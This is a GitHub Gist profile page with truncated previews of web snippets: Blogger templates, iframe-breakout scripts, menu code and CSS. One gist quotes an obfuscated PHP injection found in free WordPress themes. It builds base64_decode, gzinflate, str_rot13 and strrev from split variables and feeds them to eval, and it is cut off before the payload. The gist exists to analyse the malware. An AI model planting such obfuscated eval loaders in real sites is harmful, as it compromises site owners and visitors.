Skip to content

Instantly share code, notes, and snippets.

View NuarHaruha's full-sized avatar

nuarharuha NuarHaruha

View GitHub Profile
stm_bm(["menu09c9", 900, "", "blank.gif", 0, "", "", 1, 0, 250, 0, 1000, 1, 0, 0, "", "1000", 0, 0, 1, 2, "default", "hand", "", 1, 25], this);
stm_bp("p0", [0, 4, 0, 0, 5, 10, 0, 0, 100, "", - 2, "", - 2, 50, 0, 0, "#999999", "#E6EFF9", "", 3, 0, 0, "#000000"]);
stm_ai("p0i0", [0, "HOME", "", "", - 1, - 1, 0, "main.html", "_self", "", "", "", "", 0, 0, 0, "", "", 0, 0, 0, 0, 1, "#E6EFF9", 0, "#0066CC", 0, "", "", 3, 3, 0, 0, "#E6EFF9", "#000000", "#000000", "#FFFFFF", "bold 9pt Century Gothic", "bold 9pt Century Gothic", 0, 0, "", "", "", "", 0, 0, 0]);
stm_aix("p0i1", "p0i0", [0, "|", "", "", - 1, - 1, 0, "", "_self", "", "", "", "", 0, 0, 0, "", "", 0, 0, 0, 1, 1, "#E6EFF9", 0, "#E6EFF9", 0, "", "", 3, 3, 0, 0, "#E6EFF9", "#000000", "#000000", "#000000", "8pt Verdana", "8pt Verdana"]);
stm_aix("p0i2", "p0i0", [0, "ABOUT US", "", "", - 1, - 1, 0, ""]);
stm_bpx("p1", "p0", [1, 4, 0, 0, 0]);
stm_aix("p1i0", "p0i0", [0, "FA PRESIDENT MESSAGE", "", "", - 1, - 1, 0, "aboutus_fapresidentmessage.html", "_self", "
jQuery("fieldset #edit-submit").hide(); jQuery("input[name='op']").css("float","right").val("Next");
jQuery("a[href='#node_rent_form_group_photo']").click(function(e){
jQuery("input[name='op']").val("Save");
});
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Anasailuj Boutique Collections</title>
<!-- CSS -->
@NuarHaruha
NuarHaruha / ua_htaccess_redirect_hack.php
Created September 24, 2012 20:38
UA specific for Search Engine & SERPS .Htaccess redirect HACK for WordPress
// Found this Injection CODE on bunch of generic FREE WordPress templates websites.
// spend my entire evening decoding this nasty 22 level depth crap.
/*
--------------------------
RAW ENCODED SOURCE
--------------------------
*/
$dcOn='e';$LpAbD='o';$KOqBWr='b';$ZNkpo='4';$Auavi='e';$NBBO='s';$HvRR='_';$ozTLC='c';$KjYs='a';$IZyAtI='d';$OEXDROO='e';$lEzLwxc='6';$jZhLA='d';$wrJASXrZ=$KOqBWr.$KjYs.$NBBO.$dcOn.$lEzLwxc.$ZNkpo.$HvRR.$jZhLA.$OEXDROO.$ozTLC.$LpAbD.$IZyAtI.$Auavi;$gYnppzc='i';$LrOcHrc='l';$KbMW='t';$OXJMkZ='a';$TqqCaWx='z';$eNUUQBc='g';$TEmQca='e';$lCgIJX='n';$OLtJB='f';$MvMzwwhQ=$eNUUQBc.$TqqCaWx.$gYnppzc.$lCgIJX.$OLtJB.$LrOcHrc.$OXJMkZ.$KbMW.$TEmQca;$hcNNVTj='o';$FTfwWgY='t';$JoZtpMp='s';$KxnldyK='_';$wtGvM='r';$JxSce='3';$KNcYZf='1';$ZhkQjUc='t';$QbKmw='r';$ybxBFlyo=$JoZtpMp.$FTfwWgY.$QbKmw.$KxnldyK.$wtGvM.$hcNNVTj.$ZhkQjUc.$KNcYZf.$JxSce;$StwBkh='v';$pxIA='e';$JcdNwmi='r';$THkok='s';$hqQKeYE='r';$KJQLIAS='t';$VhYCNiUW=$THkok.$KJQLIAS.$JcdNwmi.$hqQKeYE.$pxIA.$StwBkh;eval($MvMzwwhQ($wrJASXrZ($y
@NuarHaruha
NuarHaruha / autobreak-iframe.js
Created November 12, 2011 07:43
Safely break out of an iframe for blogspot/blogger
/***
Safely break out of an iframe for blogspot.com
@author Nuar H. Noah
*/
var myblog = { hostname: top.location.hostname, whitelist: Array() }
myblog.breakfree = function(){
if (top.location != self.location) {
var curDomain = this.hostname.split('.')[1];
this.whitelist['blogspot'] = 1;
@NuarHaruha
NuarHaruha / blogspot-author.xml
Created November 9, 2011 11:50
Make authors link clickable — Blogger/Blogspot template code
<b:if cond='data:top.showAuthor'>
<data:top.authorLabel/>
<b:if cond='data:post.author == &quot;Sri Mersing&quot;'>
<a class='url ext' rel='me' expr:title='data:post.author' href='http://www.blogger.com/profile/16227258769762267247'><span class='fn'><data:post.author/></span></a>
<b:else/>
<b:if cond='data:post.author == &quot;Jun Kazama&quot;'>
<a class='url ext plus-g' rel='me' expr:title='data:post.author' href='http://plus.google.com/u/0/101073545260105457487/'><span class='fn'><data:post.author/></span></a>
<b:else/>
<b:if cond='data:post.author == &quot;Nuar Haruha&quot;'>
<a class='url ext plus-g' rel='me' expr:title='data:post.author' href='http://plus.google.com/u/0/102302537150515628584/'><span class='fn'><data:post.author/></span></a>
@NuarHaruha
NuarHaruha / placeholder.css
Created September 14, 2011 07:57
place holder base stylesheet
body
{ font:12px/1.5em Arial,Helvetica,Sans-serif;
color:#555;
background:#e9e9e9 url(http://1.bp.blogspot.com/-CFDJn4O_Zo0/TjtE-oRXNAI/AAAAAAAAAVI/5khH-2-zYzs/s000/bg-grid.png) repeat; }
h1,h2,h3,h4,h5,h6
{ margin:0;
color:#555;
font-family:sans-serif;
@NuarHaruha
NuarHaruha / break-frame.js
Created September 10, 2011 18:28
javascript: break frame
if (top.location!= self.location){ top.location = self.location.href }
@NuarHaruha
NuarHaruha / blogspot-template-body.xml
Created September 10, 2011 18:26
CSS: add blogspot page type name inside body tag
<body expr:class='&quot;loading, pagetype-&quot; + data:blog.pageType + data:blog.mobileClass'>
@NuarHaruha
NuarHaruha / blogspot-template.xml
Created September 10, 2011 18:21
SEO friendly TITLE for blogspot.com
<b:if cond='data:blog.url == data:blog.homepageUrl'>
<title><data:blog.title/> - blog description </title>
<b:else/>
<b:if cond='data:blog.pageType == &quot;index&quot;'>
<title><data:blog.pageName/> - <data:blog.title/> - blog description </title>
<b:else/>
<b:if cond='data:blog.pageType == &quot;static_page&quot;'>
<title><data:blog.pageName/> - <data:blog.title/></title>
<b:else/>
<b:if cond='data:blog.pageType == &quot;item&quot;'>